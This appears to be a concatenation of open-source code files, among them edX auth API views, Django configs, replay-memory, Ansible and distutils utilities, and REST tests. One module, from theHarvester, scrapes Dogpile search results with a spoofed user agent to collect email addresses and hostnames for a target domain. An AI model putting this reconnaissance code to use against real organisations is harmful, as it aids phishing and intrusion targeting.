return Response(status=status.HTTP_403_FORBIDDEN)
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
providers = pipeline.get_provider_user_states(user)
active_providers = [
{
"provider_id": assoc.provider.provider_id,
"name": assoc.provider.name,
"remote_id": assoc.remote_id,
}
for assoc in providers if assoc.has_account
]
# In the future this can be trivially modified to return the inactive/disconnected providers as well.
return Response({
"active": active_providers
})
class UserMappingView(ListAPIView):
"""
Map between the third party auth account IDs (remote_id) and EdX username.
This API is intended to be a server-to-server endpoint. An on-campus middleware or system should consume this.
**Use Case**
Get a paginated list of mappings between edX users and remote user IDs for all users currently
linked to the given backend.
The list can be filtered by edx username or third party ids. The filter is limited by the max length of URL.
It is suggested to query no more than 50 usernames or remote_ids in each request to stay within above
limitation
The page size can be changed by specifying `page_size` parameter in the request.
**Example Requests**
GET /api/third_party_auth/v0/providers/{provider_id}/users
GET /api/third_party_auth/v0/providers/{provider_id}/users?username={username1},{username2}
GET /api/third_party_auth/v0/providers/{provider_id}/users?username={username1}&usernames={username2}
GET /api/third_party_auth/v0/providers/{provider_id}/users?remote_id={remote_id1},{remote_id2}
GET /api/third_party_auth/v0/providers/{provider_id}/users?remote_id={remote_id1}&remote_id={remote_id2}
GET /api/third_party_auth/v0/providers/{provider_id}/users?username={username1}&remote_id={remote_id1}
**URL Parameters**
* provider_id: The unique identifier of third_party_auth provider (e.g. "saml-ubc", "oa2-google", etc.
This is not the same thing as the backend_name.). (Optional/future: We may also want to allow
this to be an 'external domain' like 'ssl:MIT' so that this API can also search the legacy
ExternalAuthMap table used by Standford/MIT)
**Query Parameters**
* remote_ids: Optional. List of comma separated remote (third party) user IDs to filter the result set.
e.g. ?remote_ids=8721384623
* usernames: Optional. List of comma separated edX usernames to filter the result set.
e.g. ?usernames=bob123,jane456
* page, page_size: Optional. Used for paging the result set, especially when getting
an unfiltered list.
**Response Values**
If the request for information about the user is successful, an HTTP 200 "OK" response
is returned.
The HTTP 200 response has the following values:
* count: The number of mappings for the backend.
* next: The URI to the next page of the mappings.
* previous: The URI to the previous page of the mappings.
* num_pages: The number of pages listing the mappings.
* results: A list of mappings returned. Each collection in the list
contains these fields.
* username: The edx username
* remote_id: The Id from third party auth provider
"""
authentication_classes = (
OAuth2Authentication,
)
serializer_class = serializers.UserMappingSerializer
provider = None
def get_queryset(self):
provider_id = self.kwargs.get('provider_id')
# permission checking. We allow both API_KEY access and OAuth2 client credential access
if not (
self.request.user.is_superuser or ApiKeyHeaderPermission().has_permission(self.request, self) or
ThirdPartyAuthProviderApiPermission(provider_id).has_permission(self.request, self)
):
raise exceptions.PermissionDenied()
# provider existence checking
self.provider = Registry.get(provider_id)
if not self.provider:
raise Http404
query_set = UserSocialAuth.objects.select_related('user').filter(provider=self.provider.backend_name)
# build our query filters
# When using multi-IdP backend, we only retrieve the ones that are for current IdP.
# test if the current provider has a slug
uid = self.provider.get_social_auth_uid('uid')
if uid is not 'uid':
# if yes, we add a filter for the slug on uid column
query_set = query_set.filter(uid__startswith=uid[:-3])
query = Q()
usernames = self.request.query_params.getlist('username', None)
remote_ids = self.request.query_params.getlist('remote_id', None)
if usernames:
usernames = ','.join(usernames)
usernames = set(usernames.split(',')) if usernames else set()
if len(usernames):
query = query | Q(user__username__in=usernames)
if remote_ids:
remote_ids = ','.join(remote_ids)
remote_ids = set(remote_ids.split(',')) if remote_ids else set()
if len(remote_ids):
query = query | Q(uid__in=[self.provider.get_social_auth_uid(remote_id) for remote_id in remote_ids])
return query_set.filter(query)
def get_serializer_context(self):
"""
Extra context provided to the serializer class with current provider. We need the provider to
remove idp_slug from the remote_id if there is any
"""
context = super(UserMappingView, self).get_serializer_context()
context['provider'] = self.provider
return context
| agpl-3.0 |
stormpath/stormpath-python-samples | project/urls.py | 1 | 1098 | from django.conf.urls import patterns, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
url(r'^$', 'chirper.views.home', name='home'),
url(r'^login/$', 'chirper.views.stormpath_login', name='login'),
url(r'^logout/$', 'chirper.views.stormpath_logout', name='logout'),
url(r'^signup/$', 'chirper.views.signup', name='signup'),
url(r'^password/send/$', 'chirper.views.send_password_token',
name='password_send'),
url(r'^password/reset', 'chirper.views.reset_password',
name='password_reset'),
url(r'^profile/$', 'chirper.views.update_user', name='profile'),
url(r'^chirps/delete/(\d+)/$', 'chirper.views.delete_chirp',
name='chirp_delete'),
url(r'^chirps/$', 'chirper.views.chirping', name='chirps'),
# Uncomment the admin/doc line below to enable admin documentation:
# url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
# Uncomment the next line to enable the admin:
# url(r'^admin/', include(admin.site.urls)),
)
| apache-2.0 |
killswitch-GUI/theHarvester | discovery/dogpilesearch.py | 23 | 1374 | import httplib
import myparser
import time
import sys
class search_dogpile:
def __init__(self, word, limit):
self.word = word
self.total_results = ""
self.server = "www.dogpile.com"
self.hostname = "www.dogpile.com"
self.userAgent = "(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
self.limit = limit
self.counter = 0
def do_search(self):
h = httplib.HTTP(self.server)
# Dogpile is hardcoded to return 10 results
h.putrequest('GET', "/search/web?qsi=" + str(self.counter)
+ "&q=\"%40" + self.word + "\"")
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, headers = h.getreply()
self.total_results += h.getfile().read()
def process(self):
while self.counter <= self.limit and self.counter <= 1000:
self.do_search()
time.sleep(1)
print "\tSearching " + str(self.counter) + " results..."
self.counter += 10
def get_emails(self):
rawres = myparser.parser(self.total_results, self.word)
return rawres.emails()
def get_hostnames(self):
rawres = myparser.parser(self.total_results, self.word)
return rawres.hostnames()
| gpl-2.0 |
Kismuz/btgym | btgym/algorithms/memory.py | 1 | 10633 | # This implementation is based on Kosuke Miyoshi code, under Apache License 2.0:
# https://miyosuda.github.io/
# https://github.com/miyosuda/unreal
from logbook import Logger, StreamHandler, WARNING
import sys
import numpy as np
from collections import deque
from btgym.algorithms.rollout import Rollout
class Memory(object):
"""
Replay memory with rebalanced replay based on reward value.
Note:
must be filled up before calling sampling methods.
"""
def __init__(self, history_size, max_sample_size, priority_sample_size, log_level=WARNING,
rollout_provider=None, task=-1, reward_threshold=0.1, use_priority_sampling=False):
"""
Args:
history_size: number of experiences stored;
max_sample_size: maximum allowed sample size (e.g. off-policy rollout length);
priority_sample_size: sample size of priority_sample() method
log_level: int, logbook.level;
rollout_provider: callable returning list of Rollouts NOT USED
task: parent worker id;
reward_threshold: if |experience.reward| > reward_threshold: experience is saved as 'prioritized';
"""
self._history_size = history_size
self._frames = deque(maxlen=history_size)
self.reward_threshold = reward_threshold
self.max_sample_size = int(max_sample_size)
self.priority_sample_size = int(priority_sample_size)
self.rollout_provider = rollout_provider
self.task = task
self.log_level = log_level
StreamHandler(sys.stdout).push_application()
self.log = Logger('ReplayMemory_{}'.format(self.task), level=self.log_level)
self.use_priority_sampling = use_priority_sampling
# Indices for non-priority frames:
self._zero_reward_indices = deque()
# Indices for priority frames:
self._non_zero_reward_indices = deque()
self._top_frame_index = 0
if use_priority_sampling:
self.sample_priority = self._sample_priority
else:
self.sample_priority = self._sample_dummy
def add(self, frame):
"""
Appends single experience frame to memory.
Args:
frame: dictionary of values.
"""
if frame['terminal'] and len(self._frames) > 0 and self._frames[-1]['terminal']:
# Discard if terminal frame continues
self.log.warning("Memory_{}: Sequential terminal frame encountered. Discarded.".format(self.task))
self.log.warning('{} -- {}'.format(self._frames[-1]['position'], frame['position']))
return
frame_index = self._top_frame_index + len(self._frames)
was_full = self.is_full()
# Append frame:
self._frames.append(frame)
# Decide and append index:
if frame_index >= self.max_sample_size - 1:
if abs(frame['reward']) <= self.reward_threshold:
self._zero_reward_indices.append(frame_index)
else:
self._non_zero_reward_indices.append(frame_index)
if was_full:
# Decide from which index to discard:
self._top_frame_index += 1
cut_frame_index = self._top_frame_index + self.max_sample_size - 1
# Cut frame if its index is lower than cut_frame_index:
if len(self._zero_reward_indices) > 0 and \
self._zero_reward_indices[0] < cut_frame_index:
self._zero_reward_indices.popleft()
if len(self._non_zero_reward_indices) > 0 and \
self._non_zero_reward_indices[0] < cut_frame_index:
self._non_zero_reward_indices.popleft()
def add_rollout(self, rollout):
"""
Adds frames from given rollout to memory with respect to episode continuation.
Args:
rollout: `Rollout` instance.
"""
# Check if current rollout is direct extension of last stored frame sequence:
if len(self._frames) > 0 and not self._frames[-1]['terminal']:
# E.g. check if it is same local episode and successive frame order:
if self._frames[-1]['position']['episode'] == rollout['position']['episode'][0] and \
self._frames[-1]['position']['step'] + 1 == rollout['position']['step'][0]:
# Means it is ok to just extend previously stored episode
pass
else:
# Means part or tail of previously recorded episode is somehow lost,
# so we need to mark stored episode as 'ended':
self._frames[-1]['terminal'] = True
self.log.warning('{} changed to terminal'.format(self._frames[-1]['position']))
# If we get a lot of such messages it is an indication something is going wrong.
# Add experiences one by one:
# TODO: pain-slow.
for i in range(len(rollout['terminal'])):
frame = rollout.get_frame(i)
self.add(frame)
def is_full(self):
return len(self._frames) >= self._history_size
def fill(self):
"""
Fills replay memory with initial experiences. NOT USED.
Supposed to be called by parent worker() just before training begins.
Args:
rollout_getter: callable, returning list of Rollouts.
"""
if self.rollout_provider is not None:
while not self.is_full():
for rollout in self.rollout_provider():
self.add_rollout(rollout)
self.log.info('Memory_{}: filled.'.format(self.task))
else:
raise AttributeError('Rollout_provider is None, can not fill memory.')
def sample_uniform(self, sequence_size):
"""
Uniformly samples sequence of successive frames of size `sequence_size` or less (~off-policy rollout).
Args:
sequence_size: maximum sample size.
Returns:
instance of Rollout of size <= sequence_size.
"""
start_pos = np.random.randint(0, self._history_size - sequence_size - 1)
# Shift by one if hit terminal frame:
if self._frames[start_pos]['terminal']:
start_pos += 1 # assuming that there are no successive terminal frames.
sampled_rollout = Rollout()
for i in range(sequence_size):
frame = self._frames[start_pos + i]
sampled_rollout.add(frame)
if frame['terminal']:
break # it's ok to return less than `sequence_size` frames if `terminal` frame encountered.
return sampled_rollout
def _sample_priority(self, size=None, exact_size=False, skewness=2, sample_attempts=100):
"""
Implements rebalanced replay.
Samples sequence of successive frames from distribution skewed by means of reward of last sample frame.
Args:
size: sample size, must be <= self.max_sample_size;
exact_size: whether accept sample with size less than 'size'
or re-sample to get sample of exact size (used for reward prediction task);
skewness: int>=1, sampling probability denominator, such as probability of sampling sequence with
last frame having non-zero reward is: p[non_zero]=1/skewness;
sample_attempts: if exact_size=True, sets number of re-sampling attempts
to get sample of continuous experiences (no `Terminal` frames inside except last one);
if number is reached - sample returned 'as is'.
Returns:
instance of Rollout().
"""
if size is None:
size = self.priority_sample_size
if size > self.max_sample_size:
size = self.max_sample_size
# Toss skewed coin:
if np.random.randint(int(skewness)) == 0:
from_zero = False
else:
from_zero = True
if len(self._zero_reward_indices) == 0:
# zero rewards container was empty
from_zero = False
elif len(self._non_zero_reward_indices) == 0:
# non zero rewards container was empty
from_zero = True
# Try to sample sequence of given length from one episode.
# Take maximum of 'sample_attempts', if no luck
# (e.g too short episodes and/or too big sampling size) ->
# return inconsistent sample and issue warning.
check_sequence = True
for attempt in range(sample_attempts):
if from_zero:
index = np.random.randint(len(self._zero_reward_indices))
end_frame_index = self._zero_reward_indices[index]
else:
index = np.random.randint(len(self._non_zero_reward_indices))
end_frame_index = self._non_zero_reward_indices[index]
start_frame_index = end_frame_index - size + 1
raw_start_frame_index = start_frame_index - self._top_frame_index
sampled_rollout = Rollout()
is_full = True
if attempt == sample_attempts - 1:
check_sequence = False
self.log.warning(
'Memory_{}: failed to sample {} successive frames, sampled as is.'.format(self.task, size)
)
for i in range(size - 1):
frame = self._frames[raw_start_frame_index + i]
sampled_rollout.add(frame)
if check_sequence:
if frame['terminal']:
if exact_size:
is_full = False
#print('attempt:', attempt)
#print('frame.terminal:', frame['terminal'])
break
# Last frame can be terminal anyway:
frame = self._frames[raw_start_frame_index + size - 1]
sampled_rollout.add(frame)
if is_full:
break
return sampled_rollout
@staticmethod
def _sample_dummy(**kwargs):
return None
class _DummyMemory:
def __init__(self):
pass
@staticmethod
def add(frame):
return None
@staticmethod
def sample_uniform(**kwargs):
return None
@staticmethod
def sample_priority(**kwargs):
return None
@staticmethod
def is_full():
return True | lgpl-3.0 |
xgds/xgds_data | xgds_data/introspection.py | 1 | 9624 | #__BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#__END_LICENSE__
try:
from taggit.managers import TaggableManager
except (ImportError, RuntimeError):
pass
from django.conf import settings
from django.db.models import fields
try:
from django.apps import apps
except ImportError:
from django.db.models import get_app
#from xgds_data.models import VirtualIncludedField
import xgds_data.models
def settingsForModel(settng, model):
"""
Does the setting list this field?
"""
mysettings = []
for amodel in model.__mro__:
try:
mysettings = mysettings + settng.get(amodel._meta.app_label).get(amodel._meta.object_name, [])
except (AttributeError, KeyError):
pass
return mysettings
def accessorDict(model):
"""
returns a dict of accessor, base relation parts that can be used on this model
"""
ad = dict([(x.name, x) for x in model._meta.fields])
ad.update(dict([(x.name, x) for x in model._meta.many_to_many]))
## do we need virtual_fields? Not sure what those are
ad.update(dict([(x.get_accessor_name(), x) for x in model._meta.get_all_related_objects()]))
ad.update(dict([(x.get_accessor_name(), x) for x in model._meta.get_all_related_many_to_many_objects()]))
return ad
def modelFields(model):
"""
Retrieve the fields associated with the given model
"""
fields = model._meta.fields
many_to_many = model._meta.many_to_many
virtual_fields = model._meta.virtual_fields
try:
myfields = fields + many_to_many + virtual_fields
except TypeError:
## fields, many_to_many are tuples in 1.9
myfields = fields + many_to_many + tuple(virtual_fields)
# nameToField = dict([(x.name,x) for x in myfields])
fieldNames = [x.name for x in myfields]
for x in dir(model):
try:
if isinstance(getattr(model, x), fields.related.ForeignRelatedObjectsDescriptor):
fieldNames.append(x )
except AttributeError:
## django may though AttributeError even for things listed by dir
pass
try:
expands = settingsForModel(settings.XGDS_DATA_EXPAND_RELATED, model)
except AttributeError as inst:
expands = []
for throughFieldName, relName, relVerboseName in expands:
if (throughFieldName is not None) and (throughFieldName in fieldNames):
myfields = myfields + (xgds_data.models.VirtualIncludedField(model, throughFieldName, relName, relVerboseName),)
else:
print("Error- VirtualField {0} on {1} references nonexistent field {2}".format(relVerboseName, modelName(model), throughFieldName))
return myfields
def isAbstract(model):
"""
Check if model is abstract. Might be a better way to do this, but I didn't find it.
"""
return model._meta.abstract
def pk(model):
"""
return the primary key
"""
return model._meta.pk
def pkValue(instance):
"""
return the primary key value
"""
try:
return instance.pk
except AttributeError:
pkval = getattr(instance,pk(instance).name)
try:
return pkval.pk
except AttributeError:
return pkval
def modelName(model):
"""
return the short name of the model (or of the instance's model)
"""
return concrete_model(model)._meta.object_name
def qualifiedModelName(model):
"""
Return the long model name with the module included
"""
return '.'.join([model.__module__,modelName(model)])
def moduleName(model):
"""
return the short name of the module (or of the instance's module)
"""
return model._meta.app_label
def verbose_name(model):
"""
return the verbose name of the model
"""
## return model._meta.verbose_name_raw
return model._meta.verbose_name.title()
def verbose_name_plural(model):
"""
return the verbose name of the model
"""
return model._meta.verbose_name_plural.title()
def db_table(model):
"""
return the database table for this model
"""
return model._meta.db_table
# def resolveModule(moduleName):
# """
# Return the module with this name
# """
# try:
# return apps.get_app_config(moduleName).module
# except NameError:
# return get_app(moduleName)
def getModuleNames():
try:
return [x.name for x in apps.get_app_configs()]
except NameError:
return [app.__name__ for app in get_apps()]
def getModels(moduleName):
try:
return apps.get_app_config(moduleName).get_models()
except NameError:
return get_models(get_app(moduleName))
def resolveModel(moduleName, modelName):
"""
Return the model with this name
"""
try:
# aconfig = apps.get_app_config(moduleName)
#
# return aconfig.get_model(modelName)
return apps.get_model(moduleName, modelName)
except NameError:
modelmodule = get_app(moduleName)
return getattr(modelmodule, modelName)
def resolveField(model, fieldName):
"""
Retrieve the field corresponding to the the name, if any
"""
for f in modelFields(model):
if (fieldName == f.name):
return f
return None
def maskField(field):
"""
Should we omit this field from search and display?
"""
try:
if isinstance(field, TaggableManager):
return True
except NameError:
pass
try:
if field.name in settingsForModel(settings.XGDS_DATA_UNMASKED_FIELDS, field.model):
return False
except AttributeError:
pass
try:
if field.name in settingsForModel(settings.XGDS_DATA_MASKED_FIELDS, field.model):
return True
except AttributeError:
pass
try:
if field is pk(field.model):
return True
except AttributeError:
pass
if field.name.startswith("_") and not field.name.startswith("__"):
return True
return False
def isOrdinalOveridden(model, field):
"""
Is this a field that looks ordinal, but isn't really?
"""
try:
return field.name in settingsForModel(settings.XGDS_DATA_NONORDINAL_FIELDS, model)
except AttributeError:
return False
def isNumeric(model, field):
"""
Is this a number field? Some aren't handled, though
"""
return (isinstance(field, (fields.AutoField,
fields.BigIntegerField,
fields.DecimalField,
fields.FloatField,
fields.IntegerField,
fields.PositiveIntegerField,
fields.PositiveSmallIntegerField,
fields.SmallIntegerField))
and not isOrdinalOveridden(model, field))
def fieldModel(field):
"""
Return the model that stores this field data
"""
try:
return fieldModel(field.targetFields()[0])
except (IndexError, AttributeError):
return field.model
def parentField(model,parent):
"""
return the field that points to this parent
"""
return model._meta.parents[parent]
## need to make this handle virtual field properly- probably pull out code from form and put in virtual field
def ordinalField(model, field):
"""
Does this field support ranges?
"""
if isOrdinalOveridden(model, field):
return False
elif isinstance(field, xgds_data.models.VirtualIncludedField):
if len(field.targetFields()):
for tmf in field.targetFields():
if not ordinalField(tmf.model, tmf):
return False
return True
else:
## I think we missed it
return False;
elif isinstance(field, (fields.AutoField,
fields.DateTimeField,
fields.DateField,
fields.DecimalField,
fields.FloatField,
fields.IntegerField,
fields.PositiveIntegerField)):
return True
else:
return False
def concreteDescendants(model):
"""
Get non-abstract descendants of this class. Does not check subclasses on concrete descendants.
"""
if isAbstract(model):
submodels = []
for sub in model.__subclasses__():
submodels = submodels + concreteDescendants(sub)
return submodels
else:
return [model]
def concrete_model(model):
"""
Get the concrete model
"""
return model._meta.concrete_model
def fullid(record):
"""An id that includes class info"""
return '%s:%s:%s' % (moduleName(record),
modelName(record),
record.pk)
## getattr(record,pk(record).name))
| apache-2.0 |
tux-00/ansible | lib/ansible/module_utils/facts/system/pkg_mgr.py | 46 | 3045 | # Collect facts related to the system package manager
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.module_utils.facts.collector import BaseFactCollector
# A list of dicts. If there is a platform with more than one
# package manager, put the preferred one last. If there is an
# ansible module, use that as the value for the 'name' key.
PKG_MGRS = [{'path': '/usr/bin/yum', 'name': 'yum'},
{'path': '/usr/bin/dnf', 'name': 'dnf'},
{'path': '/usr/bin/apt-get', 'name': 'apt'},
{'path': '/usr/bin/zypper', 'name': 'zypper'},
{'path': '/usr/sbin/urpmi', 'name': 'urpmi'},
{'path': '/usr/bin/pacman', 'name': 'pacman'},
{'path': '/bin/opkg', 'name': 'opkg'},
{'path': '/usr/pkg/bin/pkgin', 'name': 'pkgin'},
{'path': '/opt/local/bin/pkgin', 'name': 'pkgin'},
{'path': '/opt/tools/bin/pkgin', 'name': 'pkgin'},
{'path': '/opt/local/bin/port', 'name': 'macports'},
{'path': '/usr/local/bin/brew', 'name': 'homebrew'},
{'path': '/sbin/apk', 'name': 'apk'},
{'path': '/usr/sbin/pkg', 'name': 'pkgng'},
{'path': '/usr/sbin/swlist', 'name': 'HP-UX'},
{'path': '/usr/bin/emerge', 'name': 'portage'},
{'path': '/usr/sbin/pkgadd', 'name': 'svr4pkg'},
{'path': '/usr/bin/pkg', 'name': 'pkg5'},
{'path': '/usr/bin/xbps-install', 'name': 'xbps'},
{'path': '/usr/local/sbin/pkg', 'name': 'pkgng'},
{'path': '/usr/bin/swupd', 'name': 'swupd'},
{'path': '/usr/sbin/sorcery', 'name': 'sorcery'},
]
# the fact ends up being 'pkg_mgr' so stick with that naming/spelling
class PkgMgrFactCollector(BaseFactCollector):
name = 'pkg_mgr'
_fact_ids = set()
def collect(self, module=None, collected_facts=None):
facts_dict = {}
collected_facts = collected_facts or {}
pkg_mgr_name = None
if collected_facts.get('system') == 'OpenBSD':
facts_dict['pkg_mgr'] = 'openbsd_pkg'
return facts_dict
pkg_mgr_name = 'unknown'
for pkg in PKG_MGRS:
if os.path.exists(pkg['path']):
pkg_mgr_name = pkg['name']
facts_dict['pkg_mgr'] = pkg_mgr_name
return facts_dict
| gpl-3.0 |
SerCeMan/intellij-community | python/lib/Lib/distutils/file_util.py | 81 | 8341 | """distutils.file_util
Utility functions for operating on single files.
"""
# This module should be kept compatible with Python 2.1.
__revision__ = "$Id: file_util.py 37828 2004-11-10 22:23:15Z loewis $"
import os
from distutils.errors import DistutilsFileError
from distutils import log
# for generating verbose output in 'copy_file()'
_copy_action = { None: 'copying',
'hard': 'hard linking',
'sym': 'symbolically linking' }
def _copy_file_contents (src, dst, buffer_size=16*1024):
"""Copy the file 'src' to 'dst'; both must be filenames. Any error
opening either file, reading from 'src', or writing to 'dst', raises
DistutilsFileError. Data is read/written in chunks of 'buffer_size'
bytes (default 16k). No attempt is made to handle anything apart from
regular files.
"""
# Stolen from shutil module in the standard library, but with
# custom error-handling added.
fsrc = None
fdst = None
try:
try:
fsrc = open(src, 'rb')
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not open '%s': %s" % (src, errstr)
if os.path.exists(dst):
try:
os.unlink(dst)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not delete '%s': %s" % (dst, errstr)
try:
fdst = open(dst, 'wb')
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not create '%s': %s" % (dst, errstr)
while 1:
try:
buf = fsrc.read(buffer_size)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not read from '%s': %s" % (src, errstr)
if not buf:
break
try:
fdst.write(buf)
except os.error, (errno, errstr):
raise DistutilsFileError, \
"could not write to '%s': %s" % (dst, errstr)
finally:
if fdst:
fdst.close()
if fsrc:
fsrc.close()
# _copy_file_contents()
def copy_file (src, dst,
preserve_mode=1,
preserve_times=1,
update=0,
link=None,
verbose=0,
dry_run=0):
"""Copy a file 'src' to 'dst'. If 'dst' is a directory, then 'src' is
copied there with the same name; otherwise, it must be a filename. (If
the file exists, it will be ruthlessly clobbered.) If 'preserve_mode'
is true (the default), the file's mode (type and permission bits, or
whatever is analogous on the current platform) is copied. If
'preserve_times' is true (the default), the last-modified and
last-access times are copied as well. If 'update' is true, 'src' will
only be copied if 'dst' does not exist, or if 'dst' does exist but is
older than 'src'.
'link' allows you to make hard links (os.link) or symbolic links
(os.symlink) instead of copying: set it to "hard" or "sym"; if it is
None (the default), files are copied. Don't set 'link' on systems that
don't support it: 'copy_file()' doesn't check if hard or symbolic
linking is available.
Under Mac OS, uses the native file copy function in macostools; on
other systems, uses '_copy_file_contents()' to copy file contents.
Return a tuple (dest_name, copied): 'dest_name' is the actual name of
the output file, and 'copied' is true if the file was copied (or would
have been copied, if 'dry_run' true).
"""
# XXX if the destination file already exists, we clobber it if
# copying, but blow up if linking. Hmmm. And I don't know what
# macostools.copyfile() does. Should definitely be consistent, and
# should probably blow up if destination exists and we would be
# changing it (ie. it's not already a hard/soft link to src OR
# (not update) and (src newer than dst).
from distutils.dep_util import newer
from stat import ST_ATIME, ST_MTIME, ST_MODE, S_IMODE
if not os.path.isfile(src):
raise DistutilsFileError, \
"can't copy '%s': doesn't exist or not a regular file" % src
if os.path.isdir(dst):
dir = dst
dst = os.path.join(dst, os.path.basename(src))
else:
dir = os.path.dirname(dst)
if update and not newer(src, dst):
log.debug("not copying %s (output up-to-date)", src)
return dst, 0
try:
action = _copy_action[link]
except KeyError:
raise ValueError, \
"invalid value '%s' for 'link' argument" % link
if os.path.basename(dst) == os.path.basename(src):
log.info("%s %s -> %s", action, src, dir)
else:
log.info("%s %s -> %s", action, src, dst)
if dry_run:
return (dst, 1)
# On Mac OS, use the native file copy routine
if os.name == 'mac':
import macostools
try:
macostools.copy(src, dst, 0, preserve_times)
except os.error, exc:
raise DistutilsFileError, \
"could not copy '%s' to '%s': %s" % (src, dst, exc[-1])
# If linking (hard or symbolic), use the appropriate system call
# (Unix only, of course, but that's the caller's responsibility)
elif link == 'hard':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.link(src, dst)
elif link == 'sym':
if not (os.path.exists(dst) and os.path.samefile(src, dst)):
os.symlink(src, dst)
# Otherwise (non-Mac, not linking), copy the file contents and
# (optionally) copy the times and mode.
else:
_copy_file_contents(src, dst)
if preserve_mode or preserve_times:
st = os.stat(src)
# According to David Ascher <da@ski.org>, utime() should be done
# before chmod() (at least under NT).
if preserve_times:
os.utime(dst, (st[ST_ATIME], st[ST_MTIME]))
if preserve_mode and hasattr(os, 'chmod'):
os.chmod(dst, S_IMODE(st[ST_MODE]))
return (dst, 1)
# copy_file ()
# XXX I suspect this is Unix-specific -- need porting help!
def move_file (src, dst,
verbose=0,
dry_run=0):
"""Move a file 'src' to 'dst'. If 'dst' is a directory, the file will
be moved into it with the same name; otherwise, 'src' is just renamed
to 'dst'. Return the new full name of the file.
Handles cross-device moves on Unix using 'copy_file()'. What about
other systems???
"""
from os.path import exists, isfile, isdir, basename, dirname
import errno
log.info("moving %s -> %s", src, dst)
if dry_run:
return dst
if not isfile(src):
raise DistutilsFileError, \
"can't move '%s': not a regular file" % src
if isdir(dst):
dst = os.path.join(dst, basename(src))
elif exists(dst):
raise DistutilsFileError, \
"can't move '%s': destination '%s' already exists" % \
(src, dst)
if not isdir(dirname(dst)):
raise DistutilsFileError, \
"can't move '%s': destination '%s' not a valid path" % \
(src, dst)
copy_it = 0
try:
os.rename(src, dst)
except os.error, (num, msg):
if num == errno.EXDEV:
copy_it = 1
else:
raise DistutilsFileError, \
"couldn't move '%s' to '%s': %s" % (src, dst, msg)
if copy_it:
copy_file(src, dst)
try:
os.unlink(src)
except os.error, (num, msg):
try:
os.unlink(dst)
except os.error:
pass
raise DistutilsFileError, \
("couldn't move '%s' to '%s' by copy/delete: " +
"delete '%s' failed: %s") % \
(src, dst, src, msg)
return dst
# move_file ()
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
f = open(filename, "w")
for line in contents:
f.write(line + "\n")
f.close()
| apache-2.0 |
JesGor/test_rest | apprest/tests.py | 1 | 1668 | from rest_framework import status
from rest_framework.test import APITestCase
from .models import Empresa, Calificacion
from .views import *
class EmpresaRESTTests(APITestCase):
def test_crear_empresa(self):
data = { "nombre" : "test", "ciudad" : "ciudadtest", "sector" : "sectortest" }
response = self.client.post("/empresas/", data, format="json")
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Empresa.objects.get().nombre, "test")
print("Creada empresa correctamente con interfaz REST")
def test_mostrar_empresas(self):
emp1 = Empresa(nombre="test", ciudad="ciudadtest", sector="sectortest")
emp1.save()
emp2 = Empresa(nombre="test2", ciudad="ciudadtest2", sector="sectortest2")
emp2.save()
response = self.client.get("/empresas/")
self.assertEqual(response.content, b'[{"nombre":"test","ciudad":"ciudadtest","sector":"sectortest"},{"nombre":"test2","ciudad":"ciudadtest2","sector":"sectortest2"}]')
print("Listado de empresas realizado con éxito mediante interfaz REST")
class CalificacionRESTTest(APITestCase):
def test_mostrar_calificaciones(self):
e = Empresa(nombre="test", ciudad="ciudadtest", sector="sectortest")
e.save()
cal1 = Calificacion(alumno="alumtest", calificacion=10, empresa=e)
cal1.save()
cal2 = Calificacion(alumno="alum2test", calificacion=0, empresa=e)
cal2.save()
response = self.client.get("/empresas/1/")
self.assertEqual(response.content, b'[{"alumno":"alumtest","calificacion":10,"empresa":1},{"alumno":"alum2test","calificacion":0,"empresa":1}]')
print("Listado de calificacion de una empresa exitoso con interfaz REST")
# Create your tests here.
| gpl-2.0 |
amcat/amcat | navigator/views/codingjob_views.py | 1 | 14130 | ###########################################################################
# (C) Vrije Universiteit, Amsterdam (the Netherlands) #
# #
# This file is part of AmCAT - The Amsterdam Content Analysis Toolkit #
# #
# AmCAT is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Affero General Public License as published by the #
# Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# AmCAT is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public #
# License for more details. #
# #
# You should have received a copy of the GNU Affero General Public #
# License along with AmCAT. If not, see <http://www.gnu.org/licenses/>. #
###########################################################################
import json
from collections import OrderedDict
from django.contrib.postgres.aggregates import ArrayAgg
from django.http import HttpResponse
from django.shortcuts import redirect
from django.views.generic.list import ListView
from django import forms
from django.core.urlresolvers import reverse
from amcat.forms.fields import StaticModelChoiceField
from api.rest.viewsets import CodingJobViewSet
